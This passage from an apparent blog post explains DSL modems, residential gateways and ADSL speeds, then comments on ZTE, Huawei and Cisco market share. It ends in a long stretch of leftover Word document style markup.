The term DSL modem is technically used to describe "a modem which connects to a single computer, through a USB port or is installed in a computer PCI slot". The more common DSL router which combines the function of a DSL modem and a home router is a standalone device which could be connected to multiple computers through multiple Ethernet ports or an integral wireless access point. Also called as a "residential gateway", a DSL router usually manages the connection and sharing of the DSL service in a home or small office network.<br />
<br />
<a name='more'></a><br />
Most consumer DSL lines use one of several variations and varieties of Asymmetric DSL (ADSL). The "asymmetric" DSL here means that more of the bandwidth of the line is dedicated to downstream (download) data than upstream (upload) data. Hence, download rates are faster than upload rates since most users download much larger quantities of data than they actually upload. Because the telephone lines were never designed to carry such high frequency signals, DSL is distance-sensitive. The farther away from the switching center the modem is, the longer the telephone wires, the weaker the signal, and the lower the data rate that the modem can achieve. Users in metropolitan areas, close to switching centers, may have access to higher rate service, up to 8 Mbit/s than the expected rate for the same service in remote areas.<br />
<u><br /></u>
<u>Reference: en.wikipedia.org/wiki/DSL_modem</u></div>
<div style="text-align: left;">
<u><br /></u></div>
<h4 style="text-align: left;">
0x02: Market Share</h4>
<div style="text-align: left;">
The modem manufacturers mostly are mostly chinese based . Research shows that companies like ZTE & Huawei are doing very well and have gained enterprise router share in china over the past year. In China ZTE is placed third player in 2013 and 2014 with dizzying rise this year than the popular consortium Cisco. (Which happens to be more secure). This is also due to the fact that cisco's products are very costly and difficult for the home users to afford. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS3_Ka9d1TMn_maHP-n1ZZK2o8u2-9VNn9505gqsQiyWBV51rwN3opDd-dQRxfLFSspeOTmonjEbw6S1Ny5fp0v8RECXQ17tzgpvxpXjj_do1VwoLeu4RVd7V7nPLSk01YrAve5hsehwax/s1600/huwair.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS3_Ka9d1TMn_maHP-n1ZZK2o8u2-9VNn9505gqsQiyWBV51rwN3opDd-dQRxfLFSspeOTmonjEbw6S1Ny5fp0v8RECXQ17tzgpvxpXjj_do1VwoLeu4RVd7V7nPLSk01YrAve5hsehwax/s1600/huwair.jpg" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
